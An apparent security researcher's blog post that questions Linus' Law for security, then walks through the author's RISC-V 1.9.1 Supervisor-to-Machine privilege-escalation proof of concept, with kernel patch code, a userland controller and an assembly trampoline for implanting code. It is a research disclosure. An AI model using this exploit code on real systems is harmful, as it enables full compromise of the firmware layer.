In the past week, a research team from Princeton's school of engineering released details on flaws they uncovered in the RISC-V memory consistency model (MCM). This is exciting work from Professor Margaret Martonosi and her team, because it demonstrates the value of using automation to uncover design flaws in complex systems.
This strategy may be similar to the techniques used by commercial tools, such as Tortuga Logic's silicon security analysis utilities. Regardless, advances in capability from both commercial and academic teams have dramatically improved the state of the art in recent years. As a result, these bugs are being uncovered faster, and earlier in the engineering (or ratification) process, than ever before.
Codasip and Linus' Law
In response to Professor Martonosi's findings, the Codasip team released a blog post describing their thoughts in the context of long-term RISC-V reliability and security. While I typically agree with the Codasip team, and have a great deal of respect for their engineering staff, I thought it imperative to push back on one aspect of their article: complex security landscapes are not made shallow when more eyes are focused on them.
This concept, colloquially known as Linus' Law, posits that all flaws in complex (and open) systems are increasingly easy to observe, detect, and resolve as the number of users and engineers of that system increases. While this model does work for quality assurance (stability) purposes, it does not work well for subtleties that impact the security of complex systems.
While there are many reasons why this mantra fails with respect to security models, I'll focus on one example for the purposes of this blog post: Linus' Law largely implies that bugs will reveal themselves.
Security is Not Stability
Linus' Law presumes one of two things will occur to diminish the total number of bugs in a complex system:
Many engineers hunt for flaws in source code
A subset of N users out of T total users will observe and report any given bug
While there are hundreds of engineers working on the Linux code base, they are often constrained to the technology they are focused on improving or implementing. Though these engineers can identify problems within their own ecosystem, they are largely focused on the source code of their implementation, not on the resultant object code or machine code generated from it, or on the effects their code will have (and vice versa) on the many other parts of a running system. This level of visibility into a complex architecture is extremely challenging to acquire, and even more challenging to maintain. This is why, while many engineers submit patches to the Linux kernel, only a handful of engineers are authorized to actually approve code for inclusion into each branch of the kernel. Put simply, only a few individuals are capable of observing complex security flaws, and these individuals are largely bogged down by engineering tasks that do not include the overarching analysis of subtle behaviors in the context of security.
Yet, this point describes bugs that can be found easily prior to inclusion into the release of a kernel version. But, what happens when a bug does get through these checks and balances and ends up in the wild? This is where the many users part of Linus' Law comes into play. Someone, somewhere, out in production, will observe anomalous behavior. Hopefully, this user (or users) will also report this issue to the kernel team, or their distribution maintainers. It's fine to presume this will occur, but this will likely only occur if the bug is actually triggered by the user.
Complex security flaws, by contrast, are almost never triggered in the wild by accident. Exploiting a complex security flaw usually happens with intent, not arbitrarily. If one piece of a complex set of bugs leading to a critical gap in system security is triggered accidentally, it may never be recognized as a flaw impacting security, because that would require a specific chain of flaws to be triggered all at once, and in a particular order. This is highly improbable in the real world, and results in a lot of simple bugs either being ignored as irrelevant, or resolved in the context of stability and not flagged as security related, which affects who applies the patch and how quickly.
This is why applications like Ubuntu's whoopsie are imperative: they ensure that even the simplest bugs are not ignored. But this also requires the team reviewing whoopsie bug/crash reports to be capable of evaluating the risk of each flaw, then properly escalating the issue to someone with authority. So, there are still gaps even with this practice in place.
Thus, as we can see, Linus' Law works well to ensure the stability of complex systems, but it is very inefficient at identifying and guarding users against security flaws.
That Lonesome Road
The real resolution to complex security-related issues is creating a team to perform a unified analysis of each technology used in a system, and of the overarching interactions between the technologies that make up the whole system. Using this model, fewer long-term flaws make their way into system releases, and the ones that do are more likely to be simple bugs that can be detected using the presumptions in Linus' Law.
In addition, tools like Professor Martonosi's team's technology, and commercial tools like Tortuga Logic's silicon security utilities, can greatly assist an internal security team, streamlining their workload and reducing errors by optimizing their time.
This path, however, requires a long-term commitment to security, and an understanding that security is not a separate discipline from engineering, but is an effect of engineering stable systems. This is because a stable system is one that enforces rigid constraints around how data is accessed, stored, and processed. Insecure systems create arbitrary paths around these constraints, reducing the integrity of a system. Thus, any system with reduced integrity cannot be considered a stable system.
Though it comes at a cost, the positive effects of implementing a security program are long lasting for both manufacturers and consumers, ensuring greater stability and system integrity for not only end-users, but for the global Internet.
For more information on architectural security analysis, please reach out to Lab Mouse Security. We specialize in architectural security for embedded systems, from wearable IoT, to Industrial IoT, and more!
The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text.
In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten.
Finally, option 9 is used to tell the malicious kernel to trigger a call from its privilege layer (Supervisor) to Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, which is displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 represents the illegal instruction trap, which is not supported in the Machine layer of this implementation (riscv64-system-qemu and riscv-pk).
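For readers who want a picture of the userland side, here is a minimal sketch of what a controller like fakesyscall could look like. This is not the original source: the syscall number, the unused first argument, and the exact argument order are assumptions chosen to line up with the kernel patch shown later in this post (option in a1, physical address in a2, payload length in a3, payload pointer in a4), and the address used is simply the MCALL_SHUTDOWN location from my riscv-pk build.

#define _GNU_SOURCE
#include <stdint.h>
#include <unistd.h>

/* Hypothetical: the number of whichever existing system call was augmented. */
#define AUGMENTED_SYSCALL_NR 278

/* The first syscall argument is assumed unused; option, physical address,
 * payload length, and payload pointer land in a1..a4 at syscall entry. */
static long fake_syscall(long option, unsigned long phys_addr,
                         unsigned long len, const void * buf)
{
    return syscall(AUGMENTED_SYSCALL_NR, 0L, option, phys_addr, len, buf);
}

int main(void)
{
    uint8_t payload[8] = { 0 };  /* a real implant would be RISC-V machine code */

    fake_syscall(6, 0x80000dfcUL, 0, NULL);                  /* dump Machine memory  */
    fake_syscall(8, 0x80000dfcUL, sizeof(payload), payload); /* overwrite it         */
    fake_syscall(6, 0x80000dfcUL, 0, NULL);                  /* verify the overwrite */
    fake_syscall(9, 0, 0, NULL);                             /* trigger via ecall    */
    return 0;
}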
A Brief Introduction to RISC-V Privilege
The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, Mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times.
Full compromise of a system with a RISC-V core can't simply mean compromise of the User and Supervisor privilege layers, which is the goal of most modern attacks. Rather, breaking out of the Supervisor layer into the Machine layer is required. This is because of the capability that the Machine layer will have in the future.
The Hypervisor layer (H-Mode) is currently removed from the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be conglomerated with the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects.
In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.
Resolving the Risk
Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed as much when I discovered the vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the security gap caused by the 1.9.1 privilege specification's memory-protection definition. More on that later.
Regardless, I was unable to find material supporting that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue was proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste).
The proposal (for PMP: Physical Memory Protection) can be found here on github. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future.
This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise.
Besides, this was the first CPU-level security implementation flaw I've ever discovered of my own accord. So, I had extra incentive to actually exploit it. ;-)
But PMP Existed!
Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, that implementation was considered incomplete and not capable of deployment, which is probably why the qemu-system-riscv* emulators don't currently support it. As the git commit declares, the full PMP proposal was only introduced a couple of weeks prior to this post.
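To illustrate the idea (this is my own sketch, not code from riscv-pk or from the proposal itself), Machine-mode firmware that adopted the full PMP scheme could deny the Supervisor access to the firmware's own image by covering that region with a no-permission PMP entry before handing control to the kernel. The register names follow the 1.10 draft; the base, size, and entry index are illustrative.

#include <stdint.h>

#define PMP_A_NAPOT (3u << 3)  /* address-matching mode: naturally aligned power-of-two region */

/* Cover a naturally aligned, power-of-two sized region with PMP entry 0 and
 * grant no R/W/X permission: Supervisor and User accesses that match the entry
 * are denied, while the unlocked entry leaves Machine-mode accesses alone.
 * (For simplicity this write assumes the remaining pmpcfg0 fields are unused.) */
static inline void pmp_deny_supervisor(uintptr_t base, uintptr_t size)
{
    /* NAPOT encoding: the address is shifted right by 2 and the low bits encode the size. */
    uintptr_t pmpaddr = (base >> 2) | ((size >> 3) - 1);

    __asm__ volatile ("csrw pmpaddr0, %0" : : "r" (pmpaddr));
    __asm__ volatile ("csrw pmpcfg0, %0"  : : "r" ((uintptr_t)PMP_A_NAPOT));
}

Whether riscv-pk and the QEMU images will actually adopt this kind of lockdown is, as Stefan notes, a separate question.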
The Vulnerability
The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers.
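As a small illustration (mine, not part of the exploit), consider what happens when Supervisor code tries to read a Machine-level CSR such as mhartid:

/* If this runs in Supervisor mode, the csrr never returns a value: the access
 * raises an illegal-instruction exception instead, because mhartid belongs to
 * the Machine layer.  Only Machine-mode code may read it directly. */
static inline unsigned long read_mhartid(void)
{
    unsigned long id;
    __asm__ volatile ("csrr %0, mhartid" : "=r" (id));
    return id;
}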
However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team.
The second place where memory protection is defined isn't in the Machine layer at all: it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional operating system kernel executes, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, allows the Supervisor layer to control read and write access to the page tables.
For those who are unfamiliar, page tables control translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is readable, writable, or executable.
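As a concrete example (my own sketch, assuming the Sv39 scheme from the specification rather than anything unique to the exploit), a leaf page-table entry packs the physical page number together with these permission bits:

#include <stdint.h>

/* Standard RISC-V PTE flag bits. */
#define PTE_V (1UL << 0)  /* valid */
#define PTE_R (1UL << 1)  /* readable */
#define PTE_W (1UL << 2)  /* writable */
#define PTE_X (1UL << 3)  /* executable */
#define PTE_U (1UL << 4)  /* accessible to User mode */
#define PTE_A (1UL << 6)  /* accessed */
#define PTE_D (1UL << 7)  /* dirty */

#define PTE_PPN_SHIFT 10  /* the physical page number begins at bit 10 */

/* Build a leaf PTE mapping the 4 KiB physical page that contains 'pa'. */
static inline uint64_t make_leaf_pte(uint64_t pa, uint64_t flags)
{
    return ((pa >> 12) << PTE_PPN_SHIFT) | flags | PTE_V;
}

/* Example: a Supervisor read/write mapping of physical memory that happens to
 * hold Machine-layer code -- exactly the kind of entry the attack below uses. */
/* uint64_t evil = make_leaf_pte(0x800001a8UL, PTE_R | PTE_W | PTE_A | PTE_D); */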
Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer.
The attack works this way:
A malicious Supervisor kernel determines the physical address of Machine layer code
The kernel creates a page table entry that grants itself read/write access to the Machine layer
The kernel overwrites Machine layer code with a beneficial implant
The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple!
The Exploit
The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability.
A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
Identify Machine layer code that the Supervisor can trigger at will
Identify an unused or little-used function in that code that can be altered without negative consequence
Ensure arbitrary payloads can be stored within this region
Triggering Machine Layer Code
This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory.
The riscv-pk must support the embedded kernel by providing resources, such as access to the console device, information about the RISC-V CPU core the kernel is running on, and other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment).
So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. The code can be found in riscv-pk under trap cause 9 (environment call from Supervisor mode), in the mcall_trap function in machine/mtrap.c.
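To give a feel for the target, here is a simplified sketch of the shape of that handler (not the actual riscv-pk source): mcall_trap switches on the call number the Supervisor left in a7.

#define MCALL_SHUTDOWN 6   /* value 6 matches the trigger used later in this post */

/* Sketch only: 'regs' is assumed to hold the trapping hart's integer registers
 * indexed by register number, so regs[17] is a7 and regs[10] is a0. */
void mcall_trap_sketch(unsigned long * regs)
{
    unsigned long which = regs[17];     /* a7: requested machine call */
    unsigned long ret = (unsigned long)-1;

    switch (which)
    {
        case MCALL_SHUTDOWN:
            /* power the system off -- the case the exploit overwrites */
            break;
        default:
            /* console access, hart information, and other services live here */
            break;
    }

    regs[10] = ret;                     /* result handed back to the Supervisor in a0 */
}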
Unused Functionality
Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature.
This feature does precisely what it sounds like: it performs an immediate system shutdown, as if someone hit an ACPI power-off button on a PC. Presumably, we would never do this on a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here, as the functionality is small.
Looking at the assembly generated for this feature, it only gives us 6 instructions to overwrite. Not much capability can be squeezed in here! So, instead, we use those instructions to call out to another region of Machine memory, one that can't be reached directly by forcing a trap to mcall_trap.
We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already-running environment! So, why not reclaim the executable space? Reading the objdump of the current riscv-pk shows that 60 32-bit instructions (or 120 16-bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work there, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose.
Arbitrary Payloads
Storing arbitrary payloads in this region simply means building a small implant stager into our patched, malicious Linux (or other) kernel. This stager takes the physical memory address at which an implant should live, and installs the implant there. Easy! There's not much to it. The only catch is ensuring our jump instructions know the target physical address (and can reach it using a single instruction).
Linux Kernel Patch
The change to the Linux kernel is simple: we alter an existing system call to perform the implant installation and the mtrap trigger. This can be done by augmenting any system call with two chunks of code:
/* install implant at physical address a2 */
else if (regs->a1 == 8)
{
    /* Assumes 'void __iomem * x;' and 'long r;' are declared earlier in the
     * augmented system call, that the __bad_copy error label is defined later
     * in the same function, and that <linux/io.h> and <linux/uaccess.h> are
     * included for ioremap()/access_ok()/__copy_from_user().
     */

    /* Overwrite an address a2 of maximum size 4096 with
     * binary code pointed to by a4 of size a3.
     */
    printk(
        "DONB: overwriting %p:%lx\n",
        (const void *)regs->a2,
        regs->a3);

    /* Map the target physical address into kernel virtual memory. */
    x = ioremap(regs->a2, 4096);
    printk("DONB: remapped to %p\n", x);

    r = -1;

    /* Validate the userland buffer that holds the implant. */
    if (!access_ok(VERIFY_READ, regs->a4, regs->a3))
    {
        printk("DONB: bad access_ok\n");
        goto __bad_copy;
    }
    printk("DONB: access ok\n");

    /* Reject empty or oversized payloads. */
    if (regs->a3 <= 0 || regs->a3 > 4096)
    {
        printk("DONB: bad a3\n");
        goto __bad_copy;
    }
    printk("DONB: a3 ok\n");

    /* Copy the implant over the mapped Machine-layer code. */
    if (__copy_from_user(
            x,
            (const void *)regs->a4,
            regs->a3))
    {
        printk("DONB: bad copy from user\n");
        goto __bad_copy;
    }
    printk("DONB: copy ok\n");

    iounmap(x);

    /* update the tlb */
    __asm__("fence; fence.i");
}
The above code installs an implant at the physical address given in system call argument 2. Argument 4 contains a pointer to a userland buffer containing the binary to be written at the mapped virtual address, and argument 3 contains the size of the binary blob. The closing fence; fence.i sequence ensures that, since we are altering instruction memory, the hart fetches our freshly written instructions once triggered rather than executing stale cached copies of the old code.
/* trigger implant overwritten at MCALL_SHUTDOWN */
else if (regs->a1 == 9)
{
    printk("DONB(8): ok, now try the m-hook\n");

    /* MCALL_SHUTDOWN=6 */
    __asm__("li a7, 6; ecall; mv %0, a0" : "=r" (r));

    printk("DONB(8): returned = %d\n", r);
}
This code issues an ecall, causing mcall_trap to be executed in Machine mode context. This, in other words, executes our implant at a higher privilege level.
.global callreset
callreset:
    auipc t0, 0
    addi  t0, t0, -1578
    addi  t0, t0, -1578
    jalr  t0
Finally, the above code, written over the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The difference between these two addresses is 0xc54 (3156) bytes, which exceeds the ±2048 range of a single addi immediate, so two addi instructions of -1578 each are required to generate the proper negative offset from the auipc result. This can probably be done in a cleaner manner.
The only requirement left is for the implant at do_reset to restore the stack and return, so that we don't crash by leaving the Machine mode memory layout improperly adjusted. This can be accomplished by returning into the mcall_trap function at an address where it performs exactly this cleanup. In my implementation, there is only one address where this occurs: 0x80000ccc.
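As a final, hypothetical sketch (the payload body is left empty, and 0x80000ccc is simply the epilogue address from my build), an implant placed at do_reset only needs to end by jumping back to that address so the handler's own code restores the stack and returns to Supervisor mode:

/* Hypothetical implant skeleton: do arbitrary Machine-mode work, then jump
 * back into mcall_trap's epilogue so it cleans up and returns for us. */
__asm__(
    ".global implant_entry\n"
    "implant_entry:\n"
    "    /* arbitrary Machine-mode payload goes here */\n"
    "    li   t0, 0x80000ccc\n"
    "    jr   t0\n"
);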
Gimme Code
For working demonstration code, please visit my github archive where I will track all of my RISC-V related security research.